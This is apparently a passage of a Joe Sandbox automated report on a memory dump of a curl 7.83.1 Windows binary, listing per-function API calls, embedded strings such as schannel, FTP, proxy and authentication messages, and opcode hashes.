GetFileSizeEx.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7F1DE91F3
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DE91FD
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7F1DE9296
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7F1DE92DB
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DE932C
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DE916C

Part of subcall function 00007FF7F1DAEAE8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEB01
Part of subcall function 00007FF7F1DAEAE8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEB09
Part of subcall function 00007FF7F1DAEAE8: __swprintf_l.LIBCMT ref: 00007FF7F1DAEB3F
Part of subcall function 00007FF7F1DAEAE8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEB44
Part of subcall function 00007FF7F1DAEAE8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEB4E
Part of subcall function 00007FF7F1DAEAE8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEB56
Part of subcall function 00007FF7F1DAEAE8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEB62

CreateFileA.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7F1DE91C1
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DE91D0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DE92F9

Strings

schannel: failed to determine size of CA file '%s': %s, xrefs: 00007FF7F1DE920F
schannel: CA file exceeds max size of %u bytes, xrefs: 00007FF7F1DE9240
schannel: invalid path name for CA file '%s': %s, xrefs: 00007FF7F1DE917E
schannel: failed to read from CA file '%s': %s, xrefs: 00007FF7F1DE933E
schannel: failed to open CA file '%s': %s, xrefs: 00007FF7F1DE91E2

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast$File_errno$CloseCreateHandleReadSize__swprintf_l_strdupfree
String ID: schannel: CA file exceeds max size of %u bytes$schannel: failed to determine size of CA file '%s': %s$schannel: failed to open CA file '%s': %s$schannel: failed to read from CA file '%s': %s$schannel: invalid path name for CA file '%s': %s
API String ID: 4049688911-3430970913
Opcode ID: 9fcb51790bb0b48e6003486fe19f760fa10fe2a47cb6682ff324c8ada3500fe1
Instruction ID: cf5fec56ed6d022fe7e0378859bb61c06204ffa352708bc66c7a26f712a10a8f
Opcode Fuzzy Hash: 9fcb51790bb0b48e6003486fe19f760fa10fe2a47cb6682ff324c8ada3500fe1
Instruction Fuzzy Hash: B451A821A0D64246EB18BB15A4503BAA3B0BF88799FC48131ED2D477D5DFBCE504D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA33F4 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,000000A0,?,?,00000000,00007FF7F1D9B11E,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F1DA341F
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1DA3646

Strings

curl: unknown --write-out variable: '%s', xrefs: 00007FF7F1DA34E8
%header{, xrefs: 00007FF7F1DA35E4
header{, xrefs: 00007FF7F1DA35B3

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __acrt_iob_funcfputc
String ID: %header{$curl: unknown --write-out variable: '%s'$header{
API String ID: 2340846889-221383536
Opcode ID: a8ce164e3c89f8d1c334f1ba5bc17eee4447ed61ec8e2329ce53e818711a30d2
Instruction ID: 77e3ae7336feb5d03308c65352c64a8ffcd9a3df09d59cafaead2342dbaab44b
Opcode Fuzzy Hash: a8ce164e3c89f8d1c334f1ba5bc17eee4447ed61ec8e2329ce53e818711a30d2
Instruction Fuzzy Hash: EB71BF21E0C68291FB69EB19A514279E7B3AB45B84FC84435CA6E073D6DFECF405C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD7538 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 162stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DD75CD
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DD7667
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DD76A6

Strings

TTYPE, xrefs: 00007FF7F1DD7641
USER,%s, xrefs: 00007FF7F1DD75B6
BINARY, xrefs: 00007FF7F1DD773E
Unknown telnet option %s, xrefs: 00007FF7F1DD7781
XDISPLOC, xrefs: 00007FF7F1DD7680
NEW_ENV, xrefs: 00007FF7F1DD76BF
%127[^= ]%*[ =]%255s, xrefs: 00007FF7F1DD762C
Syntax error in telnet option: %s, xrefs: 00007FF7F1DD779A
%hu%*[xX]%hu, xrefs: 00007FF7F1DD7720

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: strncpy$__swprintf_l
String ID: %127[^= ]%*[ =]%255s$%hu%*[xX]%hu$BINARY$NEW_ENV$Syntax error in telnet option: %s$TTYPE$USER,%s$Unknown telnet option %s$XDISPLOC
API String ID: 36022466-748038847
Opcode ID: 42ee85beba19638c58b992d5fac87fdd081941d39d71668fd91904736a517bfe
Instruction ID: 40d4a3019a6a7a6ae692e1875f8a1f288d57483b9ca1a3cfca5443ef585f1d0e
Opcode Fuzzy Hash: 42ee85beba19638c58b992d5fac87fdd081941d39d71668fd91904736a517bfe
Instruction Fuzzy Hash: 4B815D32A08A86A5EB18EF21D9406E9B371FB48788FC54072DA6D472D5DFBCE514C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DC7914 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 121COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 00007FF7F1DC7A5D

Strings

Basic, xrefs: 00007FF7F1DC79DF
%s auth using %s with user '%s', xrefs: 00007FF7F1DC7ACE
NTLM, xrefs: 00007FF7F1DC7985
Authorization: Bearer %s, xrefs: 00007FF7F1DC7A56
AWS_SIGV4, xrefs: 00007FF7F1DC794E
Server, xrefs: 00007FF7F1DC7AC4
Digest, xrefs: 00007FF7F1DC799D
Proxy, xrefs: 00007FF7F1DC7AD9
Proxy-authorization, xrefs: 00007FF7F1DC79CB
Negotiate, xrefs: 00007FF7F1DC796F
Bearer, xrefs: 00007FF7F1DC7A3B
Authorization, xrefs: 00007FF7F1DC7A20, 00007FF7F1DC7A8B

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _scwprintf
String ID: %s auth using %s with user '%s'$AWS_SIGV4$Authorization$Authorization: Bearer %s$Basic$Bearer$Digest$NTLM$Negotiate$Proxy$Proxy-authorization$Server
API String ID: 1992661772-237531397
Opcode ID: 4488098f46b09f30fcb668fade2f7909394647ef9a85e17a79884b628fcabadf
Instruction ID: 6e3a412dd616758b498a1cbdb05a393a99fa9eb68403640959f05257f411be80
Opcode Fuzzy Hash: 4488098f46b09f30fcb668fade2f7909394647ef9a85e17a79884b628fcabadf
Instruction Fuzzy Hash: F1517B21A0868394EB24AB1994402B9A7A0FF15788FC44832EA2D837D5DFBDE645C3F0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D99E74 Relevance: 22.8, APIs: 4, Strings: 9, Instructions: 81stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F1DA50D8: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000050,00007FF7F1D99CBC), ref: 00007FF7F1DA50F9

puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D99F03
qsort.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF7F1D99F6A
puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D99F9A
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D99FB2

Strings

WARNING: curl and libcurl versions do not match. Functionality may be affected., xrefs: 00007FF7F1D99FBB
Protocols: , xrefs: 00007FF7F1D99EC8
2022-05-13, xrefs: 00007FF7F1D99EA7
curl 7.83.1 (Windows) %s, xrefs: 00007FF7F1D99E9B
Features:, xrefs: 00007FF7F1D99F1C
%s , xrefs: 00007FF7F1D99EE4
%s, xrefs: 00007FF7F1D99F7E
7.83.1, xrefs: 00007FF7F1D99FAB
Release-Date: %s, xrefs: 00007FF7F1D99EAE

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: puts$__acrt_iob_funcqsortstrcmp
String ID: %s$%s $2022-05-13$7.83.1$Features:$Protocols: $Release-Date: %s$WARNING: curl and libcurl versions do not match. Functionality may be affected.$curl 7.83.1 (Windows) %s
API String ID: 2220958200-3826092985
Opcode ID: 41133b786f8199fb09a4f6f87421efb745891282f17b25aace062c49a5d03537
Instruction ID: 2c57250a6618afc63551c34d993021a0e6a5e3eaf6877ae2d84cf6a2dc944898
Opcode Fuzzy Hash: 41133b786f8199fb09a4f6f87421efb745891282f17b25aace062c49a5d03537
Instruction Fuzzy Hash: 89414822A0894A91EB14FB15E8502B9F371FF45789FC44132D92D432E9DFACF549CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD398C Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 319COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F1D93E4C: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D93E89

_scwprintf.LIBCMT ref: 00007FF7F1DD3C4C

Strings

%u.%u.%u.%u, xrefs: 00007FF7F1DD3C45
Couldn't interpret the 227-response, xrefs: 00007FF7F1DD3EEC
%c%c%c%u%c, xrefs: 00007FF7F1DD3A4F
Bad PASV/EPSV response: %03d, xrefs: 00007FF7F1DD3F05
Can't resolve new host %s:%hu, xrefs: 00007FF7F1DD3DDE
Illegal port number in EPSV reply, xrefs: 00007FF7F1DD3A8F
Can't resolve proxy host %s:%hu, xrefs: 00007FF7F1DD3CE9
%u,%u,%u,%u,%u,%u, xrefs: 00007FF7F1DD3B66
Weirdly formatted EPSV reply, xrefs: 00007FF7F1DD3AF6
Connecting to %s (%s) port %d, xrefs: 00007FF7F1DD3E6F
Skip %u.%u.%u.%u for data connection, re-use %s instead, xrefs: 00007FF7F1DD3C06

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __stdio_common_vsscanf_scwprintf
String ID: %c%c%c%u%c$%u,%u,%u,%u,%u,%u$%u.%u.%u.%u$Bad PASV/EPSV response: %03d$Can't resolve new host %s:%hu$Can't resolve proxy host %s:%hu$Connecting to %s (%s) port %d$Couldn't interpret the 227-response$Illegal port number in EPSV reply$Skip %u.%u.%u.%u for data connection, re-use %s instead$Weirdly formatted EPSV reply
API String ID: 2840981943-1503635593
Opcode ID: 24f0d0b65d79883abe30de6639a4ded8ae393e2128ed8564cf185befcb9e77a8
Instruction ID: 00e65474dd29ee5775f8bc2ee7f1506da7f0c272359df568569d0e348005221f
Opcode Fuzzy Hash: 24f0d0b65d79883abe30de6639a4ded8ae393e2128ed8564cf185befcb9e77a8
Instruction Fuzzy Hash: 73E18562B0C682A2EB58EB25E4402BAF7B4FB44784F840035DA6D077D5DFBCE564C791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D92350 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F1D920D0: _scwprintf.LIBCMT ref: 00007FF7F1D92130

_get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D92417
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D92424
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7F1D92440
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7F1D9246C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9247B
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7F1D924A7
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7F1D924C9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D924D6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D924E4
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D924FE
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9253D

Strings

Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file., xrefs: 00007FF7F1D923EE

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ByteCharConsoleMultiWidefree$BufferInfoScreenWrite_fileno_get_osfhandle_scwprintffflushfwritemalloc
String ID: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file.
API String ID: 662453125-3734715646
Opcode ID: 86b10ed755fe1a630f016f0a566d003ef7c7c659b000f18f7e48d25883bf41e5
Instruction ID: 139d4c370cc69f25cbc16cd54337a9eb39d1da758429d0f893c079967b4abf19
Opcode Fuzzy Hash: 86b10ed755fe1a630f016f0a566d003ef7c7c659b000f18f7e48d25883bf41e5
Instruction Fuzzy Hash: A151A462A1974282FB58AB22E814379A7B0FB84B84FC44439DE5E477D5DFBCE441C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD5640 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 318COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DD58CA

Strings

server did not report OK, got %d, xrefs: 00007FF7F1DD5A61
No data was received, xrefs: 00007FF7F1DD5B27
Received only partial file: %I64d bytes, xrefs: 00007FF7F1DD5AFB
ABOR, xrefs: 00007FF7F1DD58B6
Failure sending ABOR command: %s, xrefs: 00007FF7F1DD58DF
control connection looks dead, xrefs: 00007FF7F1DD59A8
Uploaded unaligned file size (%I64d out of %I64d bytes), xrefs: 00007FF7F1DD5AC8
Exceeded storage allocation, xrefs: 00007FF7F1DD5A72
Remembering we are in dir "%s", xrefs: 00007FF7F1DD5847
partial download completed, closing connection, xrefs: 00007FF7F1DD5A03

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: ABOR$Exceeded storage allocation$Failure sending ABOR command: %s$No data was received$Received only partial file: %I64d bytes$Remembering we are in dir "%s"$Uploaded unaligned file size (%I64d out of %I64d bytes)$control connection looks dead$partial download completed, closing connection$server did not report OK, got %d
API String ID: 1488884202-265991785
Opcode ID: de3544bb73964b05517af390cdf018ffb7b67abb6b11d238282409319dbadfc8
Instruction ID: 42a909dd1279e5a740cf8e32c5c77cafbdcab0e29aaddc90b34457d0f542ac4d
Opcode Fuzzy Hash: de3544bb73964b05517af390cdf018ffb7b67abb6b11d238282409319dbadfc8
Instruction Fuzzy Hash: FFE1E122A087CA85EB64EB2495503B9B7B0BF45394FC54136CE7D072D5CFBCA444CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DC13C8 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 301COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DC17AD

Strings

Read callback asked for PAUSE when not supported, xrefs: 00007FF7F1DC16F4
Malformatted trailing header, skipping trailer, xrefs: 00007FF7F1DC152A
Moving trailers state machine from initialized to sending., xrefs: 00007FF7F1DC1413
operation aborted by trailing headers callback, xrefs: 00007FF7F1DC15E5
read function returned funny value, xrefs: 00007FF7F1DC1739
Successfully compiled trailers., xrefs: 00007FF7F1DC1566
Signaling end of chunked upload via terminating chunk., xrefs: 00007FF7F1DC1809
%zx%s, xrefs: 00007FF7F1DC1786
Signaling end of chunked upload after trailers., xrefs: 00007FF7F1DC18B5
operation aborted by callback, xrefs: 00007FF7F1DC16C1

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: %zx%s$Malformatted trailing header, skipping trailer$Moving trailers state machine from initialized to sending.$Read callback asked for PAUSE when not supported$Signaling end of chunked upload after trailers.$Signaling end of chunked upload via terminating chunk.$Successfully compiled trailers.$operation aborted by callback$operation aborted by trailing headers callback$read function returned funny value
API String ID: 1488884202-2453975552
Opcode ID: 25d3e7d7c40f438dfdbc583a0009ea452bda80cfe638505eb4e86c40afad6384
Instruction ID: 0aac66b1c90990f9420a616cb3f5d84757aca49fe1ea92d2589856b4b713a8c4
Opcode Fuzzy Hash: 25d3e7d7c40f438dfdbc583a0009ea452bda80cfe638505eb4e86c40afad6384
Instruction Fuzzy Hash: 9EE1A122A08692E6EB59EB1191403B9E7B8FB05B84F884535DA7D073D5DFBCE460C3E1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DB9260 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 300COMMON

Download Yara Rule

Strings

socks, xrefs: 00007FF7F1DB9387
Unsupported proxy syntax in '%s', xrefs: 00007FF7F1DB9671
Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support., xrefs: 00007FF7F1DB93E0
socks5, xrefs: 00007FF7F1DB9340
socks5h, xrefs: 00007FF7F1DB9323
http, xrefs: 00007FF7F1DB939A
https, xrefs: 00007FF7F1DB9306
socks4, xrefs: 00007FF7F1DB9374
Unsupported proxy scheme for '%s', xrefs: 00007FF7F1DB93AD
socks4a, xrefs: 00007FF7F1DB935A

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID:
String ID: Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support.$Unsupported proxy scheme for '%s'$Unsupported proxy syntax in '%s'$http$https$socks$socks4$socks4a$socks5$socks5h
API String ID: 0-874090715
Opcode ID: 617a550ccc24c83cccd6beebe1380ce5a86227a52f31699d76c235931b232c34
Instruction ID: 88d50a84f3821fe6208253633ff8ba31fa51d138400d28e5c3f86bc855c7b700
Opcode Fuzzy Hash: 617a550ccc24c83cccd6beebe1380ce5a86227a52f31699d76c235931b232c34
Instruction Fuzzy Hash: F4D17D61E08B8695FB18EB26D4902B9A7B0BB48799F800531CE3E573D5DFBCE545C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DC5C30 Relevance: 19.5, APIs: 3, Strings: 8, Instructions: 274stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F1DC514C: tolower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DC518E

strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DC5DB4
inet_pton.WS2_32 ref: 00007FF7F1DC5E78
inet_pton.WS2_32 ref: 00007FF7F1DC5E9A

Strings

RESOLVE %s:%d is wildcard, enabling wildcard checks, xrefs: 00007FF7F1DC6013
RESOLVE %s:%d is - old addresses discarded, xrefs: 00007FF7F1DC5F53
%255[^:]:%d, xrefs: 00007FF7F1DC5CB0
(non-permanent), xrefs: 00007FF7F1DC5FD6
Couldn't parse CURLOPT_RESOLVE removal entry '%s', xrefs: 00007FF7F1DC5CC4
Added %s:%d:%s to DNS cache%s, xrefs: 00007FF7F1DC5FE5
Resolve address '%s' found illegal, xrefs: 00007FF7F1DC603A
Couldn't parse CURLOPT_RESOLVE entry '%s', xrefs: 00007FF7F1DC6049

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: inet_pton$strtoultolower
String ID: (non-permanent)$%255[^:]:%d$Added %s:%d:%s to DNS cache%s$Couldn't parse CURLOPT_RESOLVE entry '%s'$Couldn't parse CURLOPT_RESOLVE removal entry '%s'$RESOLVE %s:%d is - old addresses discarded$RESOLVE %s:%d is wildcard, enabling wildcard checks$Resolve address '%s' found illegal
API String ID: 302596564-3811207075
Opcode ID: 6254b0986a885a797b90499b5a55a3b5628591d9766981833ccc0e9d5289b4ee
Instruction ID: c78f081ed5869af59d3139d5f93441538786ee101712e9e196d9c3d05f351218
Opcode Fuzzy Hash: 6254b0986a885a797b90499b5a55a3b5628591d9766981833ccc0e9d5289b4ee
Instruction Fuzzy Hash: D5C1F022B09A8694EB21AB21E5403F9A771EB45798FC40532DA2E177C9DFBCE941C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DCFB34 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 213networkCOMMON

Download Yara Rule

APIs

sendto.WS2_32 ref: 00007FF7F1DCFC7C
sendto.WS2_32 ref: 00007FF7F1DCFD3A
WSAGetLastError.WS2_32 ref: 00007FF7F1DCFD48
_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7F1DCFD7A

Strings

Received ACK for block %d, expecting %d, xrefs: 00007FF7F1DCFCD1
tftp_tx: internal error, event: %i, xrefs: 00007FF7F1DCFB88
tftp_tx: giving up waiting for block %d ack, xrefs: 00007FF7F1DCFCFA
Timeout waiting for block %d ACK. Retries = %d, xrefs: 00007FF7F1DCFBA0

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: sendto$ErrorLast_time64
String ID: Received ACK for block %d, expecting %d$Timeout waiting for block %d ACK. Retries = %d$tftp_tx: giving up waiting for block %d ack$tftp_tx: internal error, event: %i
API String ID: 3931062552-2715966420
